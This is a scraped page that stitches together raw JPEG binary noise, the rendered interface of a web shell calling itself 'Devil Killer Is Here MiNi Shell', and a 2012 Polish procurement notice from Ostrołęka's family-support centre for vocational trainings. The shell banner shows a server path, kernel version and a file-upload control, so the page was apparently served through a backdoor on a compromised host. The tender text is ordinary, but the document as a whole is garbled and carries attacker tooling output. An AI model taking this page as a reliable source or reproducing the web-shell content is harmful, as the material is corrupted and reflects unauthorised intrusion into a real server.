JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120622/216278-N-2012.html

<p class="kh_header"><b>Ostrołęka: Zorganizowanie i przeprowadzenie szkoleń grupowych.</b><br>
<b>Numer ogłoszenia: 216278 - 2012; data zamieszczenia: 22.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Ostrołęce , ul. Gen. J. Hallera 12, 07-410 Ostrołęka, woj. mazowieckie, tel. 29 7644130, faks 29 7643628.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.ostroleka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń grupowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń grupowych dla uczestników/uczestniczek projektu pn.: Wracam na rynek pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej oraz uczestników projektu pn. Nowa Perspektywa współfinansowanego przez Ministra Pracy i Polityki Społecznej w ramach zadania  publicznego w zakresie działalności na rzecz integracji i reintegracji zawodowej i społecznej osób zagrożonych wykluczeniem społecznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż posiada wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (t.j. Dz.U. 2008r., Nr 69, poz. 415 z późn. zm.), rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych ( Dz. U. Nr 236, poz. 2365) oraz rozporządzeniem Ministra pracy i Polityki Społecznej z dnia 15 grudnia 2010r. zmieniającym rozporządzenie w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 241, poz. 1620) oraz dokument, że wpis został zaktualizowany na 2012 rok.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że przeprowadził co najmniej jedno szkolenie grupowe w zakresie przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o tematyce tożsamej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż na czas realizacji szkolenia będzie dysponował urządzeniami umożliwiającymi realizację szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania co najmniej jedną osobą posiadającą adekwatne do zakresu szkolenia wykształcenie, kwalifikacje, doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz ofertowy - zgodny z treścią załącznika nr 1 do SIWZ.
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 u.p.z.p. - zgodny z treścią załącznika nr 2 do SIWZ.
3. Program szkolenia z wyszczególnieniem:
a) nazwa i adres miejsca szkolenia,
b) wymagania wstępne dla uczestników szkolenia,
c) czas trwania i sposób organizacji szkolenia,
d) cele szkolenia,
e) plan nauczania  określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem w miarę potrzeby części teoretycznej i części praktycznej,
f) treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzania efektów szkolenia.
4. Harmonogram zajęć szkoleniowych - na formularzu zgodnym z treścią załącznika nr 7 do SIWZ.
5. Dokumenty stwierdzające, że wskazane osoby, które będą wykonywać niniejsze zamówienie posiadają odpowiednie wykształcenie, kwalifikacje i doświadczenie zawodowe związane z tematyką szkolenia.
6. Oświadczenie o warunkach lokalowych i wyposażeniu w niezbędny sprzęt instytucji szkoleniowej - w miejscu prowadzenia szkolenia.
7. Opis materiałów szkoleniowych, które otrzymają uczestnicy szkolenia.
8. Parafowany przez Wykonawcę wzór umowy - na formularzu zgodnym z treścią załącznika nr 8 do SIWZ.
9. Certyfikat jakości usług obejmujący swoim zakresem przedmiot zamówienia (w przypadku jego posiadania).
10. Wzór zaświadczenia (dokumentu) o ukończeniu szkolenia.
11. Stosowne pełnomocnictwo(a) w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy zgodnie z art. 144 ust. 1 ustawy Pzp może nastąpić za zgodą obu stron w formie pisemnego aneksu w przypadku:
1) zmiany osób, które uczestniczyć będą w wykonaniu zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz pod warunkiem, że osoba wskazana przez Wykonawcę do realizacji zamówienia będzie posiadała kwalifikacje i doświadczenie odpowiadające co najmniej kwalifikacjom i doświadczeniu osoby wymienionej w ofercie,
2) zmiany miejsca wykonania zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz pod warunkiem, że nie zmieni się miejscowość wykonania zamówienia, a warunki lokalowe zaproponowane przez Wykonawcę będą porównywalne z warunkami wskazanymi w ofercie,
3) zwiększenia lub zmniejszenia ustalonej w umowie liczby osób skierowanych na szkolenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.ostroleka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie Ostrołęce, ul. Gen. Józefa Hallera 12, 07-410 Ostrołęka, pokój nr 18 (II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 10:00, miejsce: Siedziba Zamawiającego: Miejski Ośrodek Pomocy Rodzinie w Ostrołęce, ul. Gen. Józefa Hallera 12, 07-410 Ostrołęka, Sekretariat - pokój nr 21 (II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu pn.: Wracam na rynek pracy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie - pracownik administracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest zdobycie przez uczestniczki/uczestników szkolenia podstawowej wiedzy z zakresu prawa pracy, księgowości, organizacji pracy biurowej oraz obsługi nowoczesnego sprzętu biurowego.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie  z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) podstawowe zagadnienia z prawa pracy: 
a) nawiązywanie i rozwiązywanie stosunku pracy,
b) rodzaje umów o pracę,
c) urlopy pracownicze.
2) podstawowe zagadnienia z księgowości: 
a) ordynacja podatkowa i kodeks karno-skarbowy, 
b) podstawy rachunkowości,
c) podatkowa księga przychodów i rozchodów,
d) rozliczanie podatku dochodowego od osób fizycznych i prawnych,
e) rozliczanie składek na ubezpieczenie społeczne,
f) obsługa programu płatnik.
3) organizacja pracy biurowej:
a) przyjmowanie korespondencji,
b) obieg dokumentów,
c) ewidencjonowanie korespondencji,
d) techniki sporządzania różnych dokumentów biurowych.
4) obsługa nowoczesnych urządzeń biurowych:
a) telefonu wielofunkcyjnego, faksu, skanera, kserokopiarki.
5) profesjonalna obsługa komputera:
a) edytor teksu Word,
b) arkusz kalkulacyjny Exel,
c) Internet.
6) zajęcia praktyczne.
Szkoleniem objętych zostanie ogółem 22 osoby.
Termin realizacji zamówienia: 18 września - 26 października 2012 r. z wyłączeniem 27-28 września 2012 r. Liczba godzin szkolenia powinna obejmować minimum 200 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/ uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00.
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych. 
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem wewnętrznym, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.in. kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie - sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku sprzedawcy z wykorzystaniem komputera i kasy fiskalnej.
Szkoleniem objętych będzie ogółem 25 osób
Termin realizacji zamówienia: 01-31 października 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 170 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć) i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdą uczestniczkę/uczestnika szkolenia.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) podstawy obsługi komputera,
2) podstawy obsługi kasy fiskalnej, 
3) zasady obsługi klienta,
4) fakturowanie,
5) odpowiedzialność materialną pracowników,
6) dokumentowanie sprzedaży i zakupu,
7) techniki negocjacyjne w sprzedaży,
8) zajęcia praktyczne.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być zakończone egzaminem, wydaniem zaświadczenia o ukończeniu szkolenia i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestniczkom/uczestnikom szkolenia napoje (m.innymi kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Posiadanie przez instytucję certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie - kierowca wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest  zdobycie uprawnień niezbędnych do obsługi wózków jezdniowych z napędem spalinowym i akumulatorowym.
Program szkolenia oraz materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać następujące zagadnienia:
1) zapoznanie z budową i zasadą działania wózków jezdniowych,
2) czynności kierowcy przy obsłudze wózków,
3) wiadomości z zakresu ładunkoznawstwa,
4) zapoznanie z obowiązującymi przepisami bhp, bezpieczeństwem przeciwpożarowym, zasadami udzielania pierwszej pomocy przedlekarskiej,
5) praktyczną naukę obsługi wózków jezdniowych.
Szkoleniem objętych zostanie ogółem 8 osób.
Termin realizacji zamówienia: 08-19 października 2012 r.
Liczba godzin szkolenia powinna obejmować minimum 67 godzin edukacyjnych (przez godzinę edukacyjną należy rozumieć 45 minut zajęć)  i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych - liczba godzin trwania szkolenia ma przypadać na każdego uczestnika szkolenia.
Zajęcia powinny odbywać się od poniedziałku do piątku, za wyjątkiem dni świątecznych, w przedziale czasowym od 8:00 do 18:00. 
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin edukacyjnych.
Miejsce szkolenia: miasto Ostrołęka.
Szkolenie powinno być przeprowadzone zgodnie z wymaganiami zawartymi w Rozporządzeniu Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy używaniu wózków jezdniowych z napędem silnikowym (Dz.  U. nr 70, poz. 650 z późn. zmianami). 
Szkolenie powinno być zakończone egzaminem wewnętrznym i wydaniem zaświadczenia o uzyskanych kwalifikacjach.
Przed rozpoczęciem szkolenia Wykonawca skieruje na swój koszt osoby, które będą brać udział w szkoleniu do lekarza medycyny pracy, w celu wydania zaświadczenia o braku przeciwwskazań do wykonywania zawodu.  
Wykonawca zapewni uczestnikom szkolenia napoje (m.innymi kawę, herbatę, wodę mineralną), wyroby cukiernicze oraz obiad..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
